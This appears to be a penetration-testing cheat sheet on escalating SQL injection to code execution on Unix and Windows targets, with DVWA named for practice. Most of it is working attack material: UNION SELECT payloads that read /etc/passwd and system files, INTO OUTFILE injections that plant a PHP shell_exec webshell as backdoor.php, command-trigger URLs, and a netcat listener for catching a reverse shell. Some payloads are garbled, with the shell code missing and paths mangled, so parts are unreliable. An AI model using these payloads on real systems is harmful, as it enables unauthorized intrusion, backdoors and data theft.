SQLi to code execution

For command exection / revshells , URL encode the payoload

#Capitalized, unix  target

‘ UNION SELECT 1, load_file(/etc/passwd) #


#Using into OUTFILE fucntion to upload a webshell
Gotta find the webroot first, in this case we use /var/www

#inject:

'union select 1,’‘ INTO OUTFILE ‘/var/www/dvwa/cmd.php’ #

#Get command execution to further enumerate targets

http://11.11.11.11/dwa/cmd.php?cmd=id

#Using perl to get a reverse shell (use bash/python etc..)
Serve the reverse shell from kali /tmp using http.server

Trigger:

http://11.11.11.11/dwa/cmd.php?cmd=ls /tmp

Catch the revshell:

nc -nvlp 443

#Windows targets

Windows example:

#Using the load_file function 

....debug.php?id= union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

#Using the into OUTFILE function to get code execution
  
...debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

#then trigger with

http://11.11.11.11/backdoor.php?cmd=ipconfig

#Get command execution, write a webshell into E drive
Webroot in example  c:/wamp/www/DVWA/dvwa/
Enumerate actual webroot location of target 

....id=‘ union select 1, load_file(‘e:testfile.txt’) #

‘ union select 1, ‘‘ INTO OUTFILE ‘c:wampwwwDVWAdvwacmd.php’#

#command execution

..dwa/cmd.php?cmd=dir

#Practice the basics with

Damn Vulnerable Web Application (DVWA): 1.0.7www.vulnhub.com

PreviousOracle SQLi NextGhauri

Last updated 3 years ago